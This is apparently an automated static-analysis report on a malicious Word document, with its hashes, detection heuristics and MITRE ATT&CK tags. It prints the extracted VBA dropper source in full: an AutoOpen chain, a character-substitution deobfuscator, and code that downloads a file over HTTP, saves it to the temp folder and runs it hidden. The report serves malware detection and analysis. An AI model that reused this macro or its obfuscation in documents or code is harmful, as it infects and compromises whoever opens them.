Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c4d09d3aaf49b086…

MALICIOUS

Office (OLE)

43.0 KB Created: 2016-07-24 21:03:00 Authoring application: Microsoft Office Word First seen: 2017-03-15
MD5: 89a50a3711d126c610831d93c88201c5 SHA-1: 94ba702186a54f5cc0c2e7083fe701365225fa98 SHA-256: c4d09d3aaf49b086b138b2085e7e51982c45cc284216b8d6d620aa4067c24ddd
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro. The macro utilizes the `CreateObject` function and appears to be designed to download and execute a file from a URL, as indicated by the `OLE_VBA_HTTP_DROP_EXEC` heuristic. The `AutoOpen` subroutine is present, suggesting automatic execution upon opening the document. The script attempts to construct a URL by concatenating strings, which likely resolves to a malicious payload.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-5969387-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-5969387-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            .Write z.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim z: Set z = CreateObject(UserForm1.TextBox5.text + UserForm1.TextBox6.text + UserForm1.TextBox8.text + UserForm1.TextBox9.text + UserForm1.TextBox7.text)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Public Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        y = Environ(UserForm1.TextBox13.text + UserForm1.TextBox10.text + UserForm1.TextBox12.text + UserForm1.TextBox11.text)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2487 bytes
SHA-256: 40ed856ea0b473c406dca514f10b7f793229f23a954683b1a12d574f27d88bc7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub AutoOpen()
tsfght.chem
End Sub

Attribute VB_Name = "tsfght"
Public Function bliss(gh67sd54 As String) As String
    Dim bfe56b6 As String, ghty67sd As String, i As Long
    Dim pos As Long, gbh67kfd, ghjktuy
    bfe56b6 = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåض§Ú¥"
    ghty67sd = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNضQR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
    For i = 1 To Len(gh67sd54)
        pos = InStr(bfe56b6, Mid(gh67sd54, i, 1))
        If pos > 0 Then
            gbh67kfd = Mid(ghty67sd, pos, 1)
            ghjktuy = ghjktuy + gbh67kfd
        Else
            ghjktuy = ghjktuy + Mid(gh67sd54, i, 1)
        End If
    Next
    bliss = ghjktuy
End Function


Function chem()
tatayui.gaya
End Function

Attribute VB_Name = "tatayui"
Function gaya()
tiruka.kra
End Function


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D77089E1-03E9-4A69-9476-5F10E08CE062}{2BBADC49-1711-4A17-A55F-25ED8466EC66}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "tiruka"
Function kra()

    Dim gh, yu, y, nm
    y = Environ(UserForm1.TextBox13.text + UserForm1.TextBox10.text + UserForm1.TextBox12.text + UserForm1.TextBox11.text)
    Dim z: Set z = CreateObject(UserForm1.TextBox5.text + UserForm1.TextBox6.text + UserForm1.TextBox8.text + UserForm1.TextBox9.text + UserForm1.TextBox7.text)
    Dim x: Set x = CreateObject(tsfght.bliss(UserForm1.TextBox3.text))
    z.Open "GET", tsfght.bliss(UserForm1.TextBox1.text), False
    z.Send
    
    With x
        .Type = 1
        .Open
        .Write z.ResponseBody
        .savetofile y + tsfght.bliss("\ÕÁvhÒÕÖ.ÂÛÂ"), 2
    End With
    
    Set WshShell = CreateObject(tsfght.bliss(UserForm1.TextBox4.text))
    cmds = WshShell.Run(y + tsfght.bliss("\ÕÁvhÒÕÖ.ÂÛÂ"), 0, True)
    Set WshShell = Nothing

End Function

Open this report in the interactive analyzer, or submit your own file for analysis.